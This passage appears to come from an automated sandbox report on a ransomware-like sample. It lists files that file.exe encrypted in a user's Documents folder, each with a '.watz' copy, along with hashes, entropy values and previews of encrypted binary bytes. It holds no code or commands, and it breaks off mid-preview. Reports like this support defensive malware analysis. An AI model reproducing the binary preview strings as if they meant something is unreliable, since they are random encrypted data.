SSDEEP:	24:doH5s3AsS/uioRMUEiCKGYQsspVRPloK8A2QmfdPRbjoyz/8lXrjNQEoCq+9TZgA:amAs+ufRv4FYSRPl72ZfV5AlXrRQEoCP
MD5:	94E2A8ECC0897A9FB01B93D7C153D515
SHA1:	43AEED9845F4493088773A33B092C4BB9CB3C95D
SHA-256:	C9C6AF4691559D236A751679A9D69953021602E9B83F9777B8F4C04F1D039155
SHA-512:	671D3FDC436DBD5BD0FEA72577FA9823FD13E97855EA904FF3FFB7AFF4C45DDF32B303227CD631B13BBF485D9B0D135147DFB50B7F960B432719965ADC5155DB
Malicious:	false
Preview:	DVWHK.H.Z.b...]..w..E..}O..]..em...^..,.......yW`)...\.4....@hc3..r..%..e64.0.o!1T.M.1'+.0..g?..-...z..]..jl.@..Mi....Pm.V....W.r!...eEO.A~.JB..sL..Y.&Q......Y..\|..=...........B.D..A.,....!r.g.Nl.a...N..L....+...2....J.....G...kZ...N.\|..4.K..{-Z..^.ay>....7\|...\.....,....Z.o....N..nJH...c...4..4....p..L..qT.N.r.i.DH!....z..W.lxL..\|...T..J'.zB...n.....8.R..W...4_1.P.........\|T...Lk3z..a....5...}.... ..~..Tjd~840v..B.%U.Dm...p.k$.......L....q.1.mP....F.W.k.-....j....J......K.\|.........p.....fz.......S..7LTG.O..b...Q.(../..Mz..,O..H.J....X.,Zlr..Mt!]...M.s...{...wB..e..-...<..Z..b...u..:. .m?.]g.....k...(.4W.~1..h..!.d.gJ.3...\.{\|...,8.#..f+:......8LG..%....>7\|..$gP.kK':...d......l.....$.6.;;.-Bw..4.......R./..z.d..\._m..Y.0...'.iB4.ku..2.....\..o.4q...Jke..vm!.c....B...h...]..r.CU....:....Y\|..X.G...\|.u!.$W<.P.$....<.@[8...'..B..R..}-a..z{....3.....iq;..Xz}I.qP.~.\O.^wI.l.;..%..>..;.q>.vN.........X..$ S}7.....D.........IoM-...u...A.

C:\Users\user\Documents\DVWHKMNFNN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851997726217784
Encrypted:	false
SSDEEP:	24:doH5s3AsS/uioRMUEiCKGYQsspVRPloK8A2QmfdPRbjoyz/8lXrjNQEoCq+9TZgA:amAs+ufRv4FYSRPl72ZfV5AlXrRQEoCP
MD5:	94E2A8ECC0897A9FB01B93D7C153D515
SHA1:	43AEED9845F4493088773A33B092C4BB9CB3C95D
SHA-256:	C9C6AF4691559D236A751679A9D69953021602E9B83F9777B8F4C04F1D039155
SHA-512:	671D3FDC436DBD5BD0FEA72577FA9823FD13E97855EA904FF3FFB7AFF4C45DDF32B303227CD631B13BBF485D9B0D135147DFB50B7F960B432719965ADC5155DB
Malicious:	false
Preview:	DVWHK.H.Z.b...]..w..E..}O..]..em...^..,.......yW`)...\.4....@hc3..r..%..e64.0.o!1T.M.1'+.0..g?..-...z..]..jl.@..Mi....Pm.V....W.r!...eEO.A~.JB..sL..Y.&Q......Y..\|..=...........B.D..A.,....!r.g.Nl.a...N..L....+...2....J.....G...kZ...N.\|..4.K..{-Z..^.ay>....7\|...\.....,....Z.o....N..nJH...c...4..4....p..L..qT.N.r.i.DH!....z..W.lxL..\|...T..J'.zB...n.....8.R..W...4_1.P.........\|T...Lk3z..a....5...}.... ..~..Tjd~840v..B.%U.Dm...p.k$.......L....q.1.mP....F.W.k.-....j....J......K.\|.........p.....fz.......S..7LTG.O..b...Q.(../..Mz..,O..H.J....X.,Zlr..Mt!]...M.s...{...wB..e..-...<..Z..b...u..:. .m?.]g.....k...(.4W.~1..h..!.d.gJ.3...\.{\|...,8.#..f+:......8LG..%....>7\|..$gP.kK':...d......l.....$.6.;;.-Bw..4.......R./..z.d..\._m..Y.0...'.iB4.ku..2.....\..o.4q...Jke..vm!.c....B...h...]..r.CU....:....Y\|..X.G...\|.u!.$W<.P.$....<.@[8...'..B..R..}-a..z{....3.....iq;..Xz}I.qP.~.\O.^wI.l.;..%..>..;.q>.vN.........X..$ S}7.....D.........IoM-...u...A.

C:\Users\user\Documents\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853625322246742
Encrypted:	false
SSDEEP:	24:OyBMIsRx3+PdGFLBG/SarR+50ooq7rhAZ3aW/LVbc6vDIXyP0/I8br1bD:DBa5aGvGfrI6q/hAZ3aWxc6LIXyUbrlD
MD5:	620D7A132B77B9A7E10733268956CE0F
SHA1:	97D527FC8E36BA7A2BE8611FC8EA93C979BD1A24
SHA-256:	A8735E3567E1B1E3EAEBF0B23E1554E5DE823005734CEC1B4A131CAE376B79AD
SHA-512:	927BC79AAB04DD77510B53C0B7D8D940463A7D8647BFD031971587AB3873E8E513D989D87FE3EF6CE04FF23334609C88DD0C952BE4540D18BD5467B898B773E0
Malicious:	false
Preview:	DVWHK2J..&\.D.c6q.l4..Y...Nfs..dp._...X..\.9.........C=.E.k......ERg.~........o.:...J...'..CU.r....h0.\|.b.E.J.....e0.}......h..<-..1....;GP0fS.q.ov...ix.....}.yL..B...&b..=J........U.Tu...p.P.fZa?.. ....'...E.3..k4..9...P.-1(........\|......C........m.K..m<P.....}.;0..9.O..=.}..n./.m..C.w.pn:>..L"...by.....p..geL.W..5......H......WB4...R.B.......p..s......^..n.a\|~@...&...rR...A...........~.......U..[........K,.m.s.p..5c\|...auS2a....8..~..kF..C..<`...$..K.....g..V.....'.......n.1....O.....8.a7..#z4X..I.S2...h....`b...6..&^.n.~...6.Gh.7.......c.}].......jEN.g.....]"&."p.7&.b.&./..U.w..^Z...)+vjS.6........9.[9[.].t..C.Z`Q......Wo.Z)..^`.p<.2..+...K}A...}Vns.K=.?.O.J7....#.].U.7.s...c~....?2.../....F..>an....7.qM..%....\.4...p.T..w.6....!E6...,.^.....A..-6..GV{:l....4=........`.5g..i..hr..5z?..@&..v.Lr=.C.\|AY.;,.b..uc.J.9+.Z...K.+....%v...~. E.a..l..RK..%.......C..s..TRl...~...8..!+O.K.\|Y.LTb..U.Su...}..0[dS.:..oS.?.5...;.N....

C:\Users\user\Documents\DVWHKMNFNN.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853625322246742
Encrypted:	false
SSDEEP:	24:OyBMIsRx3+PdGFLBG/SarR+50ooq7rhAZ3aW/LVbc6vDIXyP0/I8br1bD:DBa5aGvGfrI6q/hAZ3aWxc6LIXyUbrlD
MD5:	620D7A132B77B9A7E10733268956CE0F
SHA1:	97D527FC8E36BA7A2BE8611FC8EA93C979BD1A24
SHA-256:	A8735E3567E1B1E3EAEBF0B23E1554E5DE823005734CEC1B4A131CAE376B79AD
SHA-512:	927BC79AAB04DD77510B53C0B7D8D940463A7D8647BFD031971587AB3873E8E513D989D87FE3EF6CE04FF23334609C88DD0C952BE4540D18BD5467B898B773E0
Malicious:	false
Preview:	DVWHK2J..&\.D.c6q.l4..Y...Nfs..dp._...X..\.9.........C=.E.k......ERg.~........o.:...J...'..CU.r....h0.\|.b.E.J.....e0.}......h..<-..1....;GP0fS.q.ov...ix.....}.yL..B...&b..=J........U.Tu...p.P.fZa?.. ....'...E.3..k4..9...P.-1(........\|......C........m.K..m<P.....}.;0..9.O..=.}..n./.m..C.w.pn:>..L"...by.....p..geL.W..5......H......WB4...R.B.......p..s......^..n.a\|~@...&...rR...A...........~.......U..[........K,.m.s.p..5c\|...auS2a....8..~..kF..C..<`...$..K.....g..V.....'.......n.1....O.....8.a7..#z4X..I.S2...h....`b...6..&^.n.~...6.Gh.7.......c.}].......jEN.g.....]"&."p.7&.b.&./..U.w..^Z...)+vjS.6........9.[9[.].t..C.Z`Q......Wo.Z)..^`.p<.2..+...K}A...}Vns.K=.?.O.J7....#.].U.7.s...c~....?2.../....F..>an....7.qM..%....\.4...p.T..w.6....!E6...,.^.....A..-6..GV{:l....4=........`.5g..i..hr..5z?..@&..v.Lr=.C.\|AY.;,.b..uc.J.9+.Z...K.+....%v...~. E.a..l..RK..%.......C..s..TRl...~...8..!+O.K.\|Y.LTb..U.Su...}..0[dS.:..oS.?.5...;.N....

C:\Users\user\Documents\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870377901829337
Encrypted:	false
SSDEEP:	24:nkSCdI8bfb6p9lLMfdpbXogdys97g5gAh7LNqDaVgs5JKaNYbD:kNGp9SZoTs97g+gBVgs5JKGCD
MD5:	4011686213C7A39ECFB49F35687679CB
SHA1:	39CEAB30232DAC3B34D5D785B867DA20957D7769
SHA-256:	E8808C7DAE4B3EB50BD5D2ED75CB8E52FA59E64A62EEAF18AF540C338FDAEFED
SHA-512:	47E4C39F27BF3A2C22837FA1819AEB25CA224A05E840F519A2F480925669D25B154A98928FDDE19326CA180C072B10D854DADC602F18DFD12A820A23BB3C1862
Malicious:	false
Preview:	HTAGVW...5...jw".vw.p[;!s`...aX....P..Ae..&+I..J.X.Z/2\....K.......5.n........FR.B.d...v%>K...E..._...l.......li.,.q=%.z.Q..\.....]..6....zQA.._...../ux.,.&........EvT$...V.._.S...7...j.rb...PN.<...e..."n..}..@.J\|.FI.\Q...Z............n.;..4tmd..P..r.J..0.s...O.e..m ..7whA..p..Z.Y..`.......e._.?..R....[{.4"......+A.^.E..E.6....F....\.......].... _@E......1O..YQ.<.J.N..-.u8~..,W1..PA...j.{.\|.ND..{.....#.V..../0_K..Zy<.......i..&M.(..g H..f...R.1&.Q+9.e{.H"..42.4&.I`.CY..7...._5....z%............Ck.P..>..h.P.>.P.......jb....SEf.........Z..G.Gp.8....^......Q.......4.6.B.P)Hm.0S..:.....5..VIwv.[.o..v.P1m.v;.z.....K...W...#.6.............Q.........P..E.....y....bj.V...c.....j....b!...<.zy.S.'..1..Q[.z........aX.&E...'.[5.._{...0...!...7...q.,H..I..>\.Q..@}.......nUD...R.....?.2.`..-.?....NT6JI.-w.q......Y..k...X.].<E.8....\|.ke%...:.=@!.g..5.H.H..Q^+L.......We.o.....X+.....I...7....[..3l...Yz...a....:...o:N&.{.g.jm2..O_.\......~..e?.W.Jq

C:\Users\user\Documents\HTAGVDFUIE.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870377901829337
Encrypted:	false
SSDEEP:	24:nkSCdI8bfb6p9lLMfdpbXogdys97g5gAh7LNqDaVgs5JKaNYbD:kNGp9SZoTs97g+gBVgs5JKGCD
MD5:	4011686213C7A39ECFB49F35687679CB
SHA1:	39CEAB30232DAC3B34D5D785B867DA20957D7769
SHA-256:	E8808C7DAE4B3EB50BD5D2ED75CB8E52FA59E64A62EEAF18AF540C338FDAEFED
SHA-512:	47E4C39F27BF3A2C22837FA1819AEB25CA224A05E840F519A2F480925669D25B154A98928FDDE19326CA180C072B10D854DADC602F18DFD12A820A23BB3C1862
Malicious:	false
Preview:	HTAGVW...5...jw".vw.p[;!s`...aX....P..Ae..&+I..J.X.Z/2\....K.......5.n........FR.B.d...v%>K...E..._...l.......li.,.q=%.z.Q..\.....]..6....zQA.._...../ux.,.&........EvT$...V.._.S...7...j.rb...PN.<...e..."n..}..@.J\|.FI.\Q...Z............n.;..4tmd..P..r.J..0.s...O.e..m ..7whA..p..Z.Y..`.......e._.?..R....[{.4"......+A.^.E..E.6....F....\.......].... _@E......1O..YQ.<.J.N..-.u8~..,W1..PA...j.{.\|.ND..{.....#.V..../0_K..Zy<.......i..&M.(..g H..f...R.1&.Q+9.e{.H"..42.4&.I`.CY..7...._5....z%............Ck.P..>..h.P.>.P.......jb....SEf.........Z..G.Gp.8....^......Q.......4.6.B.P)Hm.0S..:.....5..VIwv.[.o..v.P1m.v;.z.....K...W...#.6.............Q.........P..E.....y....bj.V...c.....j....b!...<.zy.S.'..1..Q[.z........aX.&E...'.[5.._{...0...!...7...q.,H..I..>\.Q..@}.......nUD...R.....?.2.`..-.?....NT6JI.-w.q......Y..k...X.].<E.8....\|.ke%...:.=@!.g..5.H.H..Q^+L.......We.o.....X+.....I...7....[..3l...Yz...a....:...o:N&.{.g.jm2..O_.\......~..e?.W.Jq

C:\Users\user\Documents\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.873873323170386
Encrypted:	false
SSDEEP:	24:HuxPkNyJ/HADZ5VDWoZe7+JkiBM5lMxpE519kN6G5GJobD:OeUHAl5Vg7+kiMME/95G5GJyD
MD5:	283826D387626657D1A20AC1773E4659
SHA1:	4AF5FB128685F0559B384B2F33D93279CCCE50B2
SHA-256:	2E2EE830E853AA17C3C696A27F55CCFEB68B0D0F239352C4F3831F0689749947
SHA-512:	C25B660B58B1F337998D0AC883DF7CAAE874AEDC3179C58377F83FB5EF1D5BFAD9EC18A305B19D3A64A111040F4B5E3228FB3D87DD47782015738C881CABF991
Malicious:	false
Preview:	JSDNG.R....%...............%.Q.v;.Z.....FD5x.I.=T.q........c.O...~..-#..\|...j...P.........Oh....IQy.8.9...)..U.ru.puj.^...;.....je.U.O.g....q..Y.,.OQ..O.....1...B.....fH=..6.!S........R...>6.......h......+..v.....x...K...{.F....@....4.6".../`L..)3..q<-M.\|...;b....S...f..!....)g'.~B.<._ ..M....{tB....._........[..q8p.`f.0[...{u.......]@...RE2....$...+..8..qQsE..ka.b..r.Zu..."<.H...Q.......Z(.La...~......l<.%.~..w.....Yr4.U..2=.5.....e.[W.S....v{Z-......QU>.%NhS....Y..'...#p........<.......D;nN.r..X...=z...C..j.9z..?9....Ii.}9..9VK4.y....d..0#.......u..{<.6~.l=..k0.....B....@.W........jT.eW.}...;jb..kw...<q...3.r.P..zS.....#.f=.n.......iid...c<.....G.s.T.V.`..x.....v..z_"..U."...w'J.. ..R.....{...."W.r..=Ur\|..v..).Q...@..z.}3..!q.dtE.{.f..<.5H..~...!K..m....,.oW..q..@...F.+.].j.7...&!...w(.1....(...<S.....K#..x.2...}.>..uK......}....E.vKg.4..G..t9.O..(....*O..4#.l\..Um/....g.Y<........2..=A..A...P..W.>).&.x.dHI......}o.jW...\|?........P..

C:\Users\user\Documents\JSDNGYCOWY.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.873873323170386
Encrypted:	false
SSDEEP:	24:HuxPkNyJ/HADZ5VDWoZe7+JkiBM5lMxpE519kN6G5GJobD:OeUHAl5Vg7+kiMME/95G5GJyD
MD5:	283826D387626657D1A20AC1773E4659
SHA1:	4AF5FB128685F0559B384B2F33D93279CCCE50B2
SHA-256:	2E2EE830E853AA17C3C696A27F55CCFEB68B0D0F239352C4F3831F0689749947
SHA-512:	C25B660B58B1F337998D0AC883DF7CAAE874AEDC3179C58377F83FB5EF1D5BFAD9EC18A305B19D3A64A111040F4B5E3228FB3D87DD47782015738C881CABF991
Malicious:	false
Preview:	JSDNG.R....%...............%.Q.v;.Z.....FD5x.I.=T.q........c.O...~..-#..\|...j...P.........Oh....IQy.8.9...)..U.ru.puj.^...;.....je.U.O.g....q..Y.,.OQ..O.....1...B.....fH=..6.!S........R...>6.......h......+..v.....x...K...{.F....@....4.6".../`L..)3..q<-M.\|...;b....S...f..!....)g'.~B.<._ ..M....{tB....._........[..q8p.`f.0[...{u.......]@...RE2....$...+..8..qQsE..ka.b..r.Zu..."<.H...Q.......Z(.La...~......l<.%.~..w.....Yr4.U..2=.5.....e.[W.S....v{Z-......QU>.%NhS....Y..'...#p........<.......D;nN.r..X...=z...C..j.9z..?9....Ii.}9..9VK4.y....d..0#.......u..{<.6~.l=..k0.....B....@.W........jT.eW.}...;jb..kw...<q...3.r.P..zS.....#.f=.n.......iid...c<.....G.s.T.V.`..x.....v..z_"..U."...w'J.. ..R.....{...."W.r..=Ur\|..v..).Q...@..z.}3..!q.dtE.{.f..<.5H..~...!K..m....,.oW..q..@...F.+.].j.7...&!...w(.1....(...<S.....K#..x.2...}.>..uK......}....E.vKg.4..G..t9.O..(....*O..4#.l\..Um/....g.Y<........2..=A..A...P..W.>).&.x.dHI......}o.jW...\|?........P..

C:\Users\user\Documents\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836798759678469
Encrypted:	false
SSDEEP:	24:5fN7jm+k8yj7fWV6IuNX4UbNFoajTd4Ybodqo0KMt447Jtqwz5TElhLbccWpUbD:7jmB8yj7fWxEbNFXf2FEZ1tb5TEXLWpG
MD5:	F1AC453C851BC79CE4C6E60A25E186F4
SHA1:	A5082538DC976B8E1887D2505CC2A4952535ADCB
SHA-256:	B78A97AA3C07BBC62121DFAD031DE23F4F1A58BA8475F7AD77EEC7A1FEB1C35D
SHA-512:	01A2F180DA3FF5B5EC7DC9315A0CC02A5B24F3DC14BD9FCBB7A76F1F0D294B2AC983ADA9C123D9AB2298B8B99FF827FC44B9955849D9547876EF6710341EF18D
Malicious:	false
Preview:	JSDNG.....pi..!Q..<.>.z.8-...Yz.g..FR>#.G.%......+..6].?......5..'..M......'~..{....GJ2y_..2#\|l.......8~I.\|\|...q.....L..].}.[o.7......p.P?.@X....0....P..J.w&<s.."......c.K..... R.S.{\|.'..z..E......O@........Jk..f.~..B:_.-@ECl..D...'Qa....}.+.W......h..SR~<{5...%/e..~....._.%{.4.].x.TP-A_B..7D....@..%\|...hO.1$[;.=4.%....c.1/.@..69..@..y..W......... ...u.m...........b..........@..._"d..+q....g.%.7bix..Zk.....'o>.h .g.....H2...S_..A..s.@.FS.Y........$..+.Z.k...O........G.k...$.f92...$..'.6z.z.92.#..A...@....e.....wE..$bD'..e.i.T..0$.P.S%..KT.M....9....y.C...Q.N...q!.............:..Bv.v-.g...Q........)7X..}.......L{6...q...#..Dy...rC.W.0.z......T.}...5'......J...>E..?...l.:/..7.......<.M........&*.tb..!mb.......-wn..g......C.....}n\|.Q-)....[.C.9.I9C..G..>...>ZT xaM...fR.29......N.-/..q..h..$Mn.9...+c.0....VkE...sy.....&.i..S&Y.#...h..upS.y.1....r.n$.... ...N.l.j..X#.Q._^...m....d....O....F.8j.;.....:.o.8...Y..}l..M.bL:\...w]ME.<F...$.%a......\|.I

C:\Users\user\Documents\JSDNGYCOWY.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836798759678469
Encrypted:	false
SSDEEP:	24:5fN7jm+k8yj7fWV6IuNX4UbNFoajTd4Ybodqo0KMt447Jtqwz5TElhLbccWpUbD:7jmB8yj7fWxEbNFXf2FEZ1tb5TEXLWpG
MD5:	F1AC453C851BC79CE4C6E60A25E186F4
SHA1:	A5082538DC976B8E1887D2505CC2A4952535ADCB
SHA-256:	B78A97AA3C07BBC62121DFAD031DE23F4F1A58BA8475F7AD77EEC7A1FEB1C35D
SHA-512:	01A2F180DA3FF5B5EC7DC9315A0CC02A5B24F3DC14BD9FCBB7A76F1F0D294B2AC983ADA9C123D9AB2298B8B99FF827FC44B9955849D9547876EF6710341EF18D
Malicious:	false
Preview:	JSDNG.....pi..!Q..<.>.z.8-...Yz.g..FR>#.G.%......+..6].?......5..'..M......'~..{....GJ2y_..2#\|l.......8~I.\|\|...q.....L..].}.[o.7......p.P?.@X....0....P..J.w&<s.."......c.K..... R.S.{\|.'..z..E......O@........Jk..f.~..B:_.-@ECl..D...'Qa....}.+.W......h..SR~<{5...%/e..~....._.%{.4.].x.TP-A_B..7D....@..%\|...hO.1$[;.=4.%....c.1/.@..69..@..y..W......... ...u.m...........b..........@..._"d..+q....g.%.7bix..Zk.....'o>.h .g.....H2...S_..A..s.@.FS.Y........$..+.Z.k...O........G.k...$.f92...$..'.6z.z.92.#..A...@....e.....wE..$bD'..e.i.T..0$.P.S%..KT.M....9....y.C...Q.N...q!.............:..Bv.v-.g...Q........)7X..}.......L{6...q...#..Dy...rC.W.0.z......T.}...5'......J...>E..?...l.:/..7.......<.M........&*.tb..!mb.......-wn..g......C.....}n\|.Q-)....[.C.9.I9C..G..>...>ZT xaM...fR.29......N.-/..q..h..$Mn.9...+c.0....VkE...sy.....&.i..S&Y.#...h..upS.y.1....r.n$.... ...N.l.j..X#.Q._^...m....d....O....F.8j.;.....:.o.8...Y..}l..M.bL:\...w]ME.<F...$.%a......\|.I

C:\Users\user\Documents\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834566369289878
Encrypted:	false
SSDEEP:	24:lLXHbGXtBAsSJOn6KLhcyB/kbKlGFu7ppRw30HHl4MzS2aZ5JWwiHjbD:lTutBLSJvMhc6kbK17p7a0nlfmsD
MD5:	381D70179E80890AFBDAEB7E9C08C86D
SHA1:	8278F8A6C96CE5E906F1F34C169D53853D563562
SHA-256:	D837B0124963A862A0584989E390C932E8D218C3D2B5627C28E7D81C42888AA3
SHA-512:	A50EFDB78A16AADB1D69327D2E7D9DB66EB907C8B8632FB78136EFB26E6BF75BA647C4C3C26BD427CD5D8D94B78C704180773D3DF1F0F11537CE1B374282EEB1
Malicious:	false
Preview:	KATAX..APW.sa...q2\|m..] ..wb.v....8.I4...x.M....zx]/........H)..w.y.q..I.~..rT...`%9......eO.C5.o....BB.&......%-+.I...fmY.s..h.TT...j..].LC+c.......V.v.;9...sE..~Y<g.T$o..... .o...=F..../..N...}........i./B.{j.S.-...i.{$dyP...n..4......t7..6H...Z..9.7.\.M....N....t...D....?..>...M...... ...q....Wa..l..q.....%.Y. ...YC..g.Ee.c....^.zgN......>..5../.../..Q.a.f'G.q....Y0.5V.r...f.4..d.....F...d.....j.o..{=.......".F.>4csp.O.JN,P...28.hc.....Zq..`..H.dP...Q..q.J.p)..,...M....S.<..j..j..He.......@...t~.D.X....G..z=Gh..b....K.?2.9S.zJ.\xn..f....\.%.'Y..._.j ia..A..mn...E.j.?...@.2.Y..A..J=......B...sh...w...YY..!....c.....y...K...D8\|eZc.}o...s.....k+....Qp.IT$...&...Pt.[.3.......5.n...vO......D...Htd.s.z...p....G..m..../..AL........=..M..&....n.......P..1..V>.bwK....T^...04..U.VaK.0.U.-...R.f.lg.yq.rH.K.......}....K.D...k..9..k"..P.bdb..-.Rh.8...K.....T.N.'V.4H.]>.'U..W.<dM.7...4........._.....ItdO.@..kd..l.a...+..4.b..*J....\qF.u\9.1...qD.\|$.

C:\Users\user\Documents\KATAXZVCPS.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834566369289878
Encrypted:	false
SSDEEP:	24:lLXHbGXtBAsSJOn6KLhcyB/kbKlGFu7ppRw30HHl4MzS2aZ5JWwiHjbD:lTutBLSJvMhc6kbK17p7a0nlfmsD
MD5:	381D70179E80890AFBDAEB7E9C08C86D
SHA1:	8278F8A6C96CE5E906F1F34C169D53853D563562
SHA-256:	D837B0124963A862A0584989E390C932E8D218C3D2B5627C28E7D81C42888AA3
SHA-512:	A50EFDB78A16AADB1D69327D2E7D9DB66EB907C8B8632FB78136EFB26E6BF75BA647C4C3C26BD427CD5D8D94B78C704180773D3DF1F0F11537CE1B374282EEB1
Malicious:	false
Preview:	KATAX..APW.sa...q2\|m..] ..wb.v....8.I4...x.M....zx]/........H)..w.y.q..I.~..rT...`%9......eO.C5.o....BB.&......%-+.I...fmY.s..h.TT...j..].LC+c.......V.v.;9...sE..~Y<g.T$o..... .o...=F..../..N...}........i./B.{j.S.-...i.{$dyP...n..4......t7..6H...Z..9.7.\.M....N....t...D....?..>...M...... ...q....Wa..l..q.....%.Y. ...YC..g.Ee.c....^.zgN......>..5../.../..Q.a.f'G.q....Y0.5V.r...f.4..d.....F...d.....j.o..{=.......".F.>4csp.O.JN,P...28.hc.....Zq..`..H.dP...Q..q.J.p)..,...M....S.<..j..j..He.......@...t~.D.X....G..z=Gh..b....K.?2.9S.zJ.\xn..f....\.%.'Y..._.j ia..A..mn...E.j.?...@.2.Y..A..J=......B...sh...w...YY..!....c.....y...K...D8\|eZc.}o...s.....k+....Qp.IT$...&...Pt.[.3.......5.n...vO......D...Htd.s.z...p....G..m..../..AL........=..M..&....n.......P..1..V>.bwK....T^...04..U.VaK.0.U.-...R.f.lg.yq.rH.K.......}....K.D...k..9..k"..P.bdb..-.Rh.8...K.....T.N.'V.4H.]>.'U..W.<dM.7...4........._.....ItdO.@..kd..l.a...+..4.b..*J....\qF.u\9.1...qD.\|$.

C:\Users\user\Documents\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840970667376571
Encrypted:	false
SSDEEP:	24:vPWQvC9k2aVylYqja8oYeSS8cyZmRnzwj5Uo1RUHeIUIHnYh275bD:FvC9k2agamHXRTNUORGbTD
MD5:	AA74CFE326F8C2400DBFC8F653E37442
SHA1:	288CE64548DF9D8F2B99FCCC90FF4C29EB7D29BC
SHA-256:	C67487CF0961C9F6EF9F7EF88DAF52C4AED92B2AE017EB9D10B2500CAF447079
SHA-512:	FCEF4F1B6C29414DFEB00BCC0B38C3728C3BB80667F983EC60475B24DFE015D44816A0D85BECC20EE04451A8004F6B6CA00B37A82B5C39C26C96002C74C762B6
Malicious:	false
Preview:	KATAX.f7....W.&;d.}...i.HS"......>..>z?.dm.Hs)..0d..H..n.R.....]3_.~.._+.......}o.E_..BE..H.w`.t......k[..L.\|.4...2.....5d..D......./w...p.7gm..X.......h!x...Q...%..]./...s.[.XvFD(.....h..{...I...A....@...Dw./..o....1.~d.C..D..fn.B.c...bIk^=...eS]. .4o0...nr..@R....K1. )./......i..Y\EZU.s.0\.@..xyr\|.TG....4...=}1E./...-.......)y....M.b.....z.8B..G.U.......`......v.I.D....Z.... ......-g....w..QL..Wl .R...(Z:k.1.v..E.F.a....]{e9k...S.;..DX..B...m..;Id..,.u...?.YEm..s.$up..MD'..Xn.m.........U[.=.H.?.....`j.^.+...[.#_0.).VA.=]....x-.h_..N..P.lk4RZ..r...... ..]/E.Z.9......;.....W.-.N1z..^W6E-..'......s.....,..+..^.\.M:Jd..C.0.+..[.-..%..Q..Up.....y....O.C......"..bSUc0>....A.h.P.a.-....hD.ON.WE...H..e.6.....j..R...8.6.....e.N.Wj..h.K...Av...Xx....xOOp...xnqc(.*.V."...#>.{k.....j..g~.'fdR/..<]...~j.v..8.g.\|..A.4K......g7X;.p..c.:.....pK4...y._&..FZ^..E/..d.A.=..%g...!ab...`.M.l....#...u,.M3....w.S-eW._].].#.e....yYgz....&.A...........2.<K

C:\Users\user\Documents\KATAXZVCPS.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840970667376571
Encrypted:	false
SSDEEP:	24:vPWQvC9k2aVylYqja8oYeSS8cyZmRnzwj5Uo1RUHeIUIHnYh275bD:FvC9k2agamHXRTNUORGbTD
MD5:	AA74CFE326F8C2400DBFC8F653E37442
SHA1:	288CE64548DF9D8F2B99FCCC90FF4C29EB7D29BC
SHA-256:	C67487CF0961C9F6EF9F7EF88DAF52C4AED92B2AE017EB9D10B2500CAF447079
SHA-512:	FCEF4F1B6C29414DFEB00BCC0B38C3728C3BB80667F983EC60475B24DFE015D44816A0D85BECC20EE04451A8004F6B6CA00B37A82B5C39C26C96002C74C762B6
Malicious:	false
Preview:	KATAX.f7....W.&;d.}...i.HS"......>..>z?.dm.Hs)..0d..H..n.R.....]3_.~.._+.......}o.E_..BE..H.w`.t......k[..L.\|.4...2.....5d..D......./w...p.7gm..X.......h!x...Q...%..]./...s.[.XvFD(.....h..{...I...A....@...Dw./..o....1.~d.C..D..fn.B.c...bIk^=...eS]. .4o0...nr..@R....K1. )./......i..Y\EZU.s.0\.@..xyr\|.TG....4...=}1E./...-.......)y....M.b.....z.8B..G.U.......`......v.I.D....Z.... ......-g....w..QL..Wl .R...(Z:k.1.v..E.F.a....]{e9k...S.;..DX..B...m..;Id..,.u...?.YEm..s.$up..MD'..Xn.m.........U[.=.H.?.....`j.^.+...[.#_0.).VA.=]....x-.h_..N..P.lk4RZ..r...... 